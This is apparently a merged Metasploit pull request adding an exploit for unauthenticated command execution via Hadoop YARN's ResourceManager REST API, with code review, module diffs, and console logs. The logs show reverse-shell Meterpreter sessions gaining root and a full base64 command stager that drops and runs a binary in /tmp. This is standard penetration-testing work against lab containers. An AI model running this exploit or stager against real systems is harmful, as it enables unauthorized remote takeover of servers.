### PR TITLE
Hadoop unauthed command execution

### PR DESCRIPTION
**Pull request by Green-m**
fix error https://github.com/rapid7/metasploit-framework/pull/10026 and pull request again.

## Description  

This module exploits an unauthorized command execution vulneralbility in Apache Hadoop through ResourceManager REST API.

## Vulnerable Application  

**Vulnerable Application Link** 

- docker  

https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn

## Vulnerable Application Installation Setup.

Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up -d` 

## Verification Steps  

  Example steps in this format (is also in the PR):

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/hadoop_unauth_exec```
  4. Do: ``set rhost x.x.x.x``
  5. Do: ``set rport 8088``
  6. Do: ``check``

``[+] 192.168.77.141:8088 The target is vulnerable.``

  7. Do: `set payload linux/x86/meterpreter/reverse_tcp`
  8. Do: ``exploit``
  9. You should get a shell.

## Scenarios  

```
msf5 > use exploit/linux/http/hadoop_unauth_exec 
msf5 exploit(linux/http/hadoop_unauth_exec) > show options 

Module options (exploit/linux/http/hadoop_unauth_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    8088             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/http/hadoop_unauth_exec) > set rhost 192.168.77.141 
rhost => 192.168.77.141        
msf5 exploit(linux/http/hadoop_unauth_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/http/hadoop_unauth_exec) > show options 

Module options (exploit/linux/http/hadoop_unauth_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.77.141   yes       The target address
   RPORT    8088             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/http/hadoop_unauth_exec) > set lhost 192.168.77.141 
lhost => 192.168.77.141
msf5 exploit(linux/http/hadoop_unauth_exec) > exploit 

[*] Started reverse TCP handler on 192.168.77.141:4444 
[*] Sending Command
[*] Command Stager progress - 100.00% done (763/763 bytes)
[*] Sending stage (853256 bytes) to 172.20.0.3
[*] Meterpreter session 1 opened (192.168.77.141:4444 -> 172.20.0.3:34138) at 2018-05-15 03:21:17 -0400

meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0
```

### CODE REVIEW

File: modules/exploits/linux/http/hadoop_unauth_exec.rb [hunk 1]
```diff
@@ -0,0 +1,94 @@
...
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Hadoop YARN ResourceManager Unauthorized Command Execution",
+      'Description'    => %q{
+          This module exploits an unauthorized command execution vulneralbility in Apache Hadoop through ResourceManager REST API.
```
Comment (bcoles) [inline modules/exploits/linux/http/hadoop_unauth_exec.rb]: `vulnerability`

File: modules/exploits/linux/http/hadoop_unauth_exec.rb [hunk 2]
```diff
@@ -0,0 +1,94 @@
...
+        [
+          [ 'URL', 'http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf'],
+          [ 'URL', 'https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn']
+        ],
+
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        =>
+        [
+          ['Automatic',                             {} ],
```
Comment (bcoles) [inline modules/exploits/linux/http/hadoop_unauth_exec.rb]: Why so spacious?

File: modules/exploits/linux/http/hadoop_unauth_exec.rb [hunk 3]
```diff
@@ -0,0 +1,94 @@
...
+      'DisclosureDate' => "Oct 19 2016",
+      'DefaultTarget'  => 0
+      ))
+
+    register_options([
+      Opt::RPORT(8088)
+    ])
+  end
+
+
```
Comment (bcoles) [inline modules/exploits/linux/http/hadoop_unauth_exec.rb]: This `check` method will only ever return `Unknown` or `Vulnerable`.

Generally speaking:
* `Unknown` is reserved for when something goes wrong, like a connection failure
* `Vulnerable` is reserved when the remote host is confirmed vulnerable

Suggest:

```ruby
  def check
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
      'method' => 'POST'
    )

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 200 && res.body.include?('application-id')
      return CheckCode::Detected
    end

    CheckCode::Safe
  end
```

Also, `&&` is preferred over `and`, and single quotes `'` are preferred over double quotes `"` when string interpolation is not required.

File: modules/exploits/linux/http/hadoop_unauth_exec.rb [hunk 4]
```diff
@@ -0,0 +1,94 @@
...
+      'am-container-spec'   => {
+          'commands' => {'command' => "#{cmd}"},
+      }
+    }
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, "/ws/v1/cluster/apps"),
+      'method'            => 'POST',
+      'ctype'             => 'application/json',
+      'data'              => post.to_json
```
Comment (bcoles) [inline modules/exploits/linux/http/hadoop_unauth_exec.rb]: Why so spacious?

File: modules/exploits/linux/http/hadoop_unauth_exec.rb (hunk 3 above)
Comment (Green-m) [reply modules/exploits/linux/http/hadoop_unauth_exec.rb]: I have updated it. 
But it seems that string would never be printed in `check` function.

**Comment by wvu-r7** [comment]
Aww, I forgot about this one. I really enjoyed the preso. I'll take this.

**Comment by Green-m** [comment]
@wvu-r7  Thanks a lot for your support. 

I found there are lots of PRs assigned to you, take care yourself and do have a rest : )

**Comment by wvu-r7** [comment]
I appreciate your thoughtfulness, @Green-m. I have not forgotten about #9780 either!

File: documentation/modules/exploit/linux/http/hadoop_unauth_exec.md [hunk 5]
```diff
@@ -0,0 +1,112 @@
+## Description  
+
+This module exploits an unauthorized command execution vulneralbility in Apache Hadoop through ResourceManager REST API.
```
Comment (bcoles) [inline documentation/modules/exploit/linux/http/hadoop_unauth_exec.md]: Suggestion. Semantics.

`unauthorized` is kind of implied.

`unauthenticated` appears more applicable and also matches with the module file name `hadoop_unauth_exec`. Although, it's possible I misunderstand the issue, as a quick read of the references reveals `unauthorized` takes on a somewhat different meaning in the Hadoop cluster security model context.

Either way, the module file name should match the module name.

Comment (bcoles) [reply documentation/modules/exploit/linux/http/hadoop_unauth_exec.md]: typo: `vulnerability`

File: modules/exploits/linux/http/hadoop_unauth_exec.rb (hunk 3 above)
Comment (bcoles) [reply modules/exploits/linux/http/hadoop_unauth_exec.rb]: `vprint_*` methods are printed only when `VERBOSE` is set to `true`. [Metasploit scripture](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method) preaches silent `check` methods.

File: modules/exploits/linux/http/hadoop_unauth_exec.rb [hunk 6]
```diff
@@ -0,0 +1,94 @@
...
+
+  def exploit
+    print_status('Sending Command')
+    execute_cmdstager
+  end
+
+  def execute_command(cmd, opts = {})
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
+      'method'        => 'POST'
```
Comment (bcoles) [inline modules/exploits/linux/http/hadoop_unauth_exec.rb]: Mismatched indentation

File: modules/exploits/linux/http/hadoop_unauth_exec.rb [hunk 7]
```diff
@@ -0,0 +1,94 @@
...
+    )
+
+    app_id = res.get_json_document['application-id']
+
+    post = {
+      'application-id'      => app_id,
+      'application-name'    => Rex::Text.rand_text_alpha_lower(4..12),
+      'application-type'    => 'YARN',
+      'am-container-spec'   => {
+          'commands' => {'command' => "#{cmd}"},
```
Comment (bcoles) [inline modules/exploits/linux/http/hadoop_unauth_exec.rb]: No need for string interpolation here. `to_s` is preferred.

```ruby
'commands' => {'command' => cmd.to_s}
```

File: modules/exploits/linux/http/hadoop_unauth_exec.rb [hunk 8]
```diff
@@ -0,0 +1,94 @@
...
+      }
+    }
+
+    res = send_request_cgi(
```
Comment (bcoles) [inline modules/exploits/linux/http/hadoop_unauth_exec.rb]: Mismatched indentation for the hash key values.

File: modules/exploits/linux/http/hadoop_unauth_exec.rb [hunk 9]
```diff
@@ -0,0 +1,94 @@
...
+      'Targets'        =>
+        [
+          ['Automatic',  {} ],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Oct 19 2016',
+      'DefaultTarget'  => 0
+      ))
+
+    register_options([
```
Comment (bcoles) [inline modules/exploits/linux/http/hadoop_unauth_exec.rb]: Personal preference. When there's only one module option with a short description, suggest:

```ruby
    register_options([Opt::RPORT(8088)])
# or
    register_options [Opt::RPORT(8088)]
```

Alternatively, as the default option is also an implied option (`RPORT` is implied for `remote` modules); you could bypass `register_options` entirely, and instead use the `DefaultOptions` key :

```ruby
'DefaultOptions' => {'RPORT' => 8088}
```

File: modules/exploits/linux/http/hadoop_unauth_exec.rb [hunk 10]
```diff
@@ -0,0 +1,94 @@
...
+      Opt::RPORT(8088)
+    ])
+  end
+
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/ws/v1/cluster/apps/new-application'),
```
Comment (bcoles) [inline modules/exploits/linux/http/hadoop_unauth_exec.rb]: Mismatched indentation

File: modules/exploits/linux/http/hadoop_unauth_exec.rb [hunk 11]
```diff
@@ -0,0 +1,94 @@
...
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Hadoop YARN ResourceManager Unauthorized Command Execution',
```
Comment (bcoles) [inline modules/exploits/linux/http/hadoop_unauth_exec.rb]: See comments on the documentation regarding `Unauthorized` vs `Unauthenticated`

File: modules/exploits/linux/http/hadoop_unauth_exec.rb [hunk 12]
```diff
@@ -0,0 +1,94 @@
...
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
```
Comment (bcoles) [inline modules/exploits/linux/http/hadoop_unauth_exec.rb]: Style nit pick. `info = {}` with whitespace.

**Comment by Green-m** [comment]
@bcoles 
Thanks for your reviews and suggestions.
I found the return value of `send_request_cgi` would not ever be `nil` or `false`. 
When the connection couldn't be established, the function `send_request_cgi` would throw a error and `check` exited with nothing output. 
I updated the `check` method so that the error message could be printed normaliy.

**Comment by wvu-r7** [comment]
@Green-m: Please see if #10229 is related.

**Comment by wvu-r7** [comment]
Works nicely for me:

```
msf5 exploit(linux/http/hadoop_unauth_exec) > run

[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Sending Command
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysEgABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/AbbYx.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/mbaWM' < '/tmp/AbbYx.b64' ; chmod +x '/tmp/mbaWM' ; '/tmp/mbaWM' ; rm -f '/tmp/mbaWM' ; rm -f '/tmp/AbbYx.b64'"]
[*] Command Stager progress - 100.00% done (819/819 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (816260 bytes) to 172.18.0.5
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.5:51056) at 2018-07-12 21:49:43 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.18.0.5
OS           : [redacted]
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

`check` is returning `Detected`, which I think is appropriate given the response.

```
msf5 exploit(linux/http/hadoop_unauth_exec) > check
[*] 172.18.0.2:8088 The target service is running, but could not be validated.
msf5 exploit(linux/http/hadoop_unauth_exec) >
```

**Comment by wvu-r7** [comment]
https://github.com/rapid7/metasploit-framework/commit/50252c75d645f35c39d06a79925cf8b278a1ab73

**Comment by wvu-r7** [comment]
# Release Notes

This adds a command execution exploit against Hadoop nodes running an unauthenticated YARN ResourceManager WebUI.

File: modules/exploits/linux/http/hadoop_unauth_exec.rb (hunk 3 above)
Comment (wvu-r7) [reply modules/exploits/linux/http/hadoop_unauth_exec.rb]: #10229

Comment (wvu-r7) [reply modules/exploits/linux/http/hadoop_unauth_exec.rb]: Before #10303, you should `rescue Rex::ConnectionError` even with `send_request_cgi`.

**Comment by Green-m** [comment]
Something missed.

I did not differentiate  `CheckCode::Detected`, `CheckCode::Appears` and `CheckCode::Vulnerable `  since I was a newbie, so I use the `CheckCode::Detected`.

Now I test it, the `check` method output is : 
`The target service is running, but could not be validated.`

I don't think it's a good and helpful message, maybe it should be `CheckCode::Appears` ?

**Comment by wvu-r7** [comment]
@Green-m: I hadn't drilled down to see how precise your `POST` request was, so I left it as `Detected`. Judging by the URI you used and the nature of the response, I'd think you could upgrade this to `Appears`.

**Pull request merged**